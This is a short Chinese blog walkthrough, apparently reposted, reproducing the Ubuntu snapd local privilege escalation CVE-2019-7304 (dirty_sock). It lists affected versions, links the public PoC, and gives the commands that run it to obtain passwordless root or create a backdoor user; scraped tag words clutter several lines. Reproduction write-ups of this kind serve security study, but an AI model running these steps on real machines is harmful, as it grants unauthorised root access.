Ubuntu 提权漏洞(CVE-2019-7304)复现
漏洞描述:
Ubuntu 版本:python
Ubuntu 18.10git
Ubuntu 18.04 LTSgithub
Ubuntu 16.04 LTSubuntu
Ubuntu 14.04 LTSbash
2.28 < snapd < 2.37 会存在该漏洞ssh
Poc Github:https://github.com/initstring/dirty_sock网站
#1
注册并登录,
https://login.ubuntu.com/
在 Ubuntu 上,生成密钥
ssh-keygen -t rsa -C "your_email@example.com"
查看公钥spa
将公钥复制到网站上3d
接下来执行 pocblog
python3 ./dirty_sockv1.py -u "sch01ar@163.com" -k "../.ssh/id_rsa"
执行完以后 sch01ar 被修改成 Ubuntu 上的用户名
接着切换为 root 用户
sudo -i
切换成 root 用户时不须要输入密码
#2
直接运行脚本
python3 dirty_sockv2.py
执行完会生成一个 dirty_sock 的用户,密码也是这个
相关文章
- 1. Sudo提权漏洞复现
- 2. Ubuntu 16.04 提权漏洞
- 3. [提权]CVE-2018-8120漏洞复现
- 4. Ubuntu内核提权(CVE-2017-16995)漏洞的复现&脏牛漏洞
- 5. [漏洞复现]CVE-2019-14287 sudo提权漏洞
- 6. 漏洞总结-linux提权漏洞
- 7. 漏洞复现
- 8. CVE-2017-16995————Ubuntu本地提权漏洞
- 9. UFO 提权漏洞分析
- 10. Tomcat本地提权漏洞
- 更多相关文章...
- • Ubuntu Docker 安装 - Docker教程
- • Docker 安装 Ubuntu - Docker教程
- • ☆基于Java Instrument的Agent实现
- • Spring Cloud 微服务实战(三) - 服务注册与发现
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
欢迎关注本站公众号,获取更多信息
